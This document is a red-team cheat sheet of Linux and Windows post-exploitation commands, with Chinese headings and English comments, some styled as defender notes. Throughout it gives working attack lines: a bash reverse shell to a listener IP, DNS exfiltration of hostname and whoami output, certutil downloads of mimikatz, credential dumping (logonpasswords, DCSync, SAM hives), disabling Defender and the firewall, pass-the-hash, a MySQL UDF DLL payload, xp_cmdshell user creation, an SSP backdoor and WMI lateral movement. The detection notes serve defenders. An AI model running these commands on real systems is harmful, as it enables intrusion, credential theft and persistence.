Linux一句话反弹
# Reverse shell through bash's built-in /dev/tcp: an interactive bash gets its stdout/stderr (>&)
# and its stdin (0>&1) redirected onto a TCP connection to 192.168.1.123:12345, the listener address.
# Defender note: the process is plain bash with a socket for stdio plus an outbound connection to an
# unusual port; egress filtering and auditing of shells whose stdio is a socket are the controls.
bash -i >& /dev/tcp/192.168.1.123/12345 0>&1
Linux敏感文件搜索
# Search the filesystem for configuration files that may hold credentials or JDBC connection strings.
# NOTE(review): *.properties on the next line is unquoted, so a matching file in the current directory
# would expand the glob before find sees it; the quoted forms further down avoid that.
find / -name *.properties 2>/dev/null | grep WEB-INF
# NOTE(review): the next line is two separate commands run together (the second starts at the second
# `find`); it also lacks the 2>/dev/null the other lines use.
find / -name "*.properties" | xargs egrep -i "user|pass|pwd|uname|login|db_" find / -regex ".*\.properties\|.*\.conf\|.*\.config" | xargs grep -E "=jdbc:|pass="
find /webapp -regex ".*\.properties" -print 2>/dev/null | xargs grep -E "=jdbc:|rsync"
find / -regex ".*\.properties" -print 2>/dev/null
find / -regex ".*\.properties\|.*\.conf\|.*\.config\|.*\.sh" | xargs grep -E "=jdbc:|pass=|passwd="
# /web路径 is a placeholder for the web application root.
grep -r 'setCipherKey(Base64.decode(' /web路径
find / -regex ".*\.xml\|.*\.properties\|.*\.conf\|.*\.config\|.*\.jsp" | xargs grep -E "setCipherKey"
# Defender note: plaintext secrets in config files are exactly what these searches surface; keep them out of
# world-readable files (or in a secrets store) so a compromised low-privilege account gains nothing here.
Linux保存shell
# Keep the shell inside a tmux session named ccc so it survives the terminal or network link closing.
# create a new session
tmux new -s ccc
# list sessions
tmux ls
# attach to the session
tmux a -t ccc
# delete the session
tmux kill-session -t ccc
Linux建立交互shell
# Upgrade a bare reverse shell to an interactive TTY. Defender note: python spawning /bin/bash via pty
# from a process whose stdio is a socket is a strong process-tree signal.
# inside the reverse shell, fork a bash through a python one-liner
python -c 'import pty; pty.spawn("/bin/bash")'
# suspend the reverse shell (the python step above already gives a basically usable interactive shell)
Ctrl-Z
echo $TERM # note the $TERM value (xterm here)
stty -a # note the stty settings (optional) — rows 39; columns 153;
# put the local terminal in raw mode so keystrokes pass straight through
stty raw -echo
fg # bring the suspended nc back with fg; fg prints nothing; press Enter afterwards, garbled output at that point is expected
开启3389
# fDenyTSConnections=0 enables Remote Desktop; Terminal" "Server is one cmd way of quoting the space in the
# key name. Defender note: alert on writes to this value and on RDP appearing where it is not expected;
# 3389 is only the default port — the actual port is read by the reg query below.
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
mimikatz读取rdp密码
# mimikatz, one command per quoted argument: gain debug privilege, dump the DPAPI master keys cached in
# LSASS, start logging, decrypt the saved-credential blob at the Credentials path (xxxx = blob name), exit.
# Defender note: this needs admin plus LSASS read access; LSA Protection and LSASS-access monitoring apply.
"privilege::debug" "sekurlsa::dpapi" "log" "dpapi::cred /in:C:/Users/Administrator/AppData/Local/Microsoft/Credentials/xxxx" "exit"
查看远程桌面端口:
# reads the port RDP listens on; a non-3389 value is a common customisation.
reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber
锁屏:
# locks the interactive session (harmless by itself).
rundll32.exe user32.dll,LockWorkStation
远程下载:
# certutil used as a downloader (URL is a placeholder); the second form is labelled //bypass by the author.
# Defender note: key detection on certutil.exe making outbound HTTP requests or writing files, not on exact argv.
certutil.exe -urlcache -split -f http://xxxxx/mimikatz.exe
certutil.exe && certutil.exe -urlcache -split -f http://xxxxx/mimikatz.exe //bypass
修改WDigest存储明文:
# UseLogonCredential=1 turns WDigest plaintext credential caching in LSASS back on (no /f, so reg prompts
# if the value already exists). Defender note: this value should be 0 or absent on every host; alert on any write.
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1
关闭defender:
# disables Defender through the Policies key (no /f). Defender note: on current builds Tamper Protection may
# block this, and the write is logged either way.
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /d 1 /t REG_DWORD
# add C:\tmp as an exclusion path so files there are not scanned. Defender note: current exclusions are visible
# via Get-MpPreference and should be reviewed.
powershell -Command Add-MpPreference -ExclusionPath "C:\tmp"
https://docs.microsoft.com/fr-fr/powershell/module/defender/add-mppreference?view=win10-ps
防火墙:
# turn the Windows Firewall off / back on for all profiles. Defender note: the off command is recorded in the
# firewall event log and should alert.
netsh advfirewall set allprofiles state off
netsh advfirewall set allprofiles state on
读取wifi密码:
# for /f over `netsh wlan show profiles`: skip the 9 header lines, split "Profile : name" on ':' (%j = name),
# then show each profile with key=clear, which prints the stored passphrase. %i/%j are the interactive-cmd
# forms (%%i/%%j inside a .bat). The `| findstr -i -v echo` stage only filters the echoed name; netsh
# presumably ignores that stdin, so the pipe into it is cosmetic.
for /f "skip=9 tokens=1,2 delims=:" %i in ('netsh wlan show profiles') do @echo %j | findstr -i -v echo | netsh wlan show profiles %j key=clear
远程桌面保存凭据:
# lists saved credentials (targets and user names only)
cmdkey /list
pth
# NOTE(review): despite the pth heading this is a password logon, not pass-the-hash: net use to IPC$ on every
# host in ips.txt with one fixed administrator password, which sits in plain text on the command line.
# Defender note: one source producing 4624/4625 against many hosts in quick succession is the spray signature.
FOR /F %i in (ips.txt) do net use \\%i\ipc$ "admin!@#45" /user:administrator
无回显Linux:
# Out-of-band output over DNS when the target shows no command output: the result becomes a subdomain label
# of a domain the tester controls (xxx.win placeholder) and shows up in that domain's query log.
# Backticks and $(...) are equivalent; $(...) is the preferred form. NOTE(review): `id` prints spaces and
# parentheses, so that line does not form a single hostname label.
ping `hostname`.xxx.win
ping `id`.xxx.win
ping $(whoami).xxx.win
无回显Windows:
# same idea with for /f over the command output (%x is the interactive-cmd form)
cmd /c for /f %x in ('hostname') do ping -n 1 %x.xxx.win
cmd /c for /f %x in ('whoami') do ping -n 1 %x.xxx.win
ping %USERNAME%.avfisher.win -n 1
# Defender note: DNS lookups for names embedding host or user identifiers; force DNS through internal
# resolvers and log the queries.
添加用户:
# create a local user, add it to Administrators, delete it (name/password are placeholders).
# Defender note: 4720 (user created) and local-group membership changes; the password is in argv.
net user name password /add
net localgroup administrators name /add
net user name /delete
域内信息收集:
# domain enumeration with net. NOTE(review): the trailing //… text on these lines is a note, not cmd comment
# syntax, so net receives it as an extra argument; and the quotes around Domain Admins are curly
# (U+201C/U+201D) — use straight ASCII quotes as on the Domain Controllers line.
net user /domain //获取域用户列表
net group /domain //查询域内所有用户组列表
net group “Domain Admins” /domain //查询域管理员用户
net group "Domain Controllers" /domain //查看域控制器
net localgroup administrators /domain //查询域内置本地管理员组用户
# recursive listing of Group Policy XML under the DC's SYSVOL share (域控 = DC name). Defender note: SYSVOL
# is readable by all domain users; legacy Group Policy Preference XML files can embed credentials — remove them.
dir /s /a \\域控\sysvol\*.xml
mimikatz:
# in-memory credential dump: debug privilege, then sekurlsa::logonpasswords (the "(s)" is the author's shorthand).
privilege::debug
sekurlsa::logonpassword(s)
# DCSync: pull every account's secrets from a DC of test.com (placeholder) through replication, csv output;
# needs replication rights. Defender note: directory-replication access (4662) from an account that is not a DC.
lsadump::dcsync /domain:test.com /all /csv
# copy the tool to another host's admin share (admin-pc placeholder)
xcopy mimikatz \\admin-pc\c$\temp
reg mimikatz:
# offline variant: save the SYSTEM and SAM hives (admin required) and parse them later with lsadump::sam.
# Defender note: `reg save HKLM\SAM` in process-creation logs is a high-confidence signal.
reg save HKLM\SYSTEM D:\sys.hiv
reg save HKLM\SAM D:\sam.hiv
lsadump::sam /sam:sam.hiv /system:sys.hiv
powershell允许执行脚本:
# RemoteSigned allows unsigned local scripts. Execution policy is not a security boundary and should not be
# treated as a control.
Set-ExecutionPolicy RemoteSigned
pth:
# pass-the-hash: start a process whose network logons authenticate with the given NTLM hash (hash values are
# examples); the second form runs mstsc in Restricted Admin mode. Defender note: typically a 4624 logon type 9
# (NewCredentials) with logon process seclogo; keep Restricted Admin RDP disabled unless required.
sekurlsa::pth /user:administrator /domain:workgroup /ntlm:ccef208c6485269c20db2cad21734fe7
sekurlsa::pth /user:administrator /domain:xxx /ntlm:xxxxxxxxxxxxxxxxxxxxx "/run:mstsc.exe /restrictedadmin" //desktop
frp:
# frpc.ini: [common] points the client at the frp server (placeholders); [plugin_socks5] publishes a SOCKS5
# proxy on the server's remote_port, authenticated by plugin_user/plugin_passwd — a tunnel back into the
# network the client sits in.
[common]
server_addr = xxx
server_port = xxx
token = xxx
[plugin_socks5]
type = tcp
remote_port = xxxx
plugin = socks5
plugin_user = xxx
plugin_passwd = xx
# Defender note: a long-lived outbound TCP session from a workstation to one external host carrying
# bidirectional traffic is the signature; application allow-listing stops the dropped frpc binary.
powershell弹框:
# system-modal message box through VisualBasic's Interaction.MsgBox (text xxxxx); the second argument is the
# MsgBoxStyle flag list, the third the title.
Add-Type -AssemblyName Microsoft.VisualBasic; [Microsoft.VisualBasic.Interaction]::MsgBox("xxxxx", "OKOnly,MsgBoxSetForeground,SystemModal,Exclamation", "")
mysql-udf:
# show secure_file_priv (the 'sec%' match): when it is set, INTO DUMPFILE below is confined to that directory.
show variables like "sec%"
# show plugin_dir: the dumpfile path must be inside it for SONAME to find the library.
show variables like 'plugin%';
# stage the DLL in a table as hex literals (0x4d5a… is the PE/MZ header; both literals are truncated in these notes)
create table temp(data longblob);
insert into temp(data) values (0x4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000f00000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000000000000000000);
update temp set data = concat(data,0x33c2ede077a383b377a383b377a383b369f110b375a383b369f100b37da383b369f107b375a383b35065f8b374a383b377a382b35ba383b369f10ab376a383b369f116b375a383b369f111b376a383b369f112b376a383b35269636877a383b300000000000000000000000000000000504500006486060070b1834b00000000);
# write the blob into plugin_dir (the author's phpstudy path; backslashes are doubled in the string)
select data from temp into dumpfile "G:\\phpstudy_pro\\Extensions\\MySQL5.7.26\\lib\\plugin\\udf.dll";
create function sys_eval returns string soname 'udf.dll'; # create the sys_eval function backed by udf.dll
# Defender note: this needs the FILE privilege and a plugin_dir writable by the server process; keep
# secure_file_priv set, plugin_dir read-only for the server account, and alert on CREATE FUNCTION … SONAME.
mssql xp_cmdshell
-- enable xp_cmdshell (needs sysadmin) and run net user through it; super123. is the author's example password.
-- Defender note: sp_configure changes are recorded in the default trace; keep xp_cmdshell disabled and alert
-- on its enablement.
exec sp_configure 'show advanced options', 1;reconfigure;
exec sp_configure 'xp_cmdshell',1;reconfigure;
exec master..xp_cmdshell 'net user test super123. /add'
登录日志 ID
4624 登录成功
4625 登录失败
4634 注销成功
4647 用户启动的注销
4672 特权登录（管理员等特殊权限账户登录）
4720 创建用户
4697 / 7045 服务安装（如 PsExec）
ssp
# register a custom Security Support Provider via the registry
# adds mimilib1.dll to the LSA "Security Packages" value (REG_MULTI_SZ). Because /f overwrites the value, it
# ends up holding only this entry — easy to baseline and alert on; the DLL is loaded into LSASS at the next
# boot. Defender note: LSA Protection (RunAsPPL) refuses unsigned SSP DLLs.
reg add "HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa" /v "Security Packages" /d "mimilib1.dll" /t REG_MULTI_SZ /f
# mimikatz injection: memssp patches the SSP into the running LSASS without a reboot
privilege::debug
misc::memssp
springboot内存泄露
# OQL (Eclipse MAT syntax) over a Java heap dump: every Hashtable entry whose key string contains "password".
# The heading presumably means a leaked heap dump rather than a memory leak. Defender note: a heap dump holds
# every in-memory secret, so heap-dump/actuator endpoints must be authenticated or disabled.
select * from java.util.Hashtable$Entry x WHERE (toString(x.key).contains("password"))
wmic横向
# lateral movement: remote process creation through WMI on 192.168.1.1 with explicit credentials
# (placeholders); the password is in argv and therefore in process-creation logs. NOTE(review): the `'`
# before the closing quote looks like a stray character. Defender note: on the target, WmiPrvSE.exe
# spawning cmd.exe after a type-3 logon is the standard signature.
wmic /node:"192.168.1.1" /password:"****" /user:"workgroup\xxxxx" process call create "cmd.exe /c xxxxx'"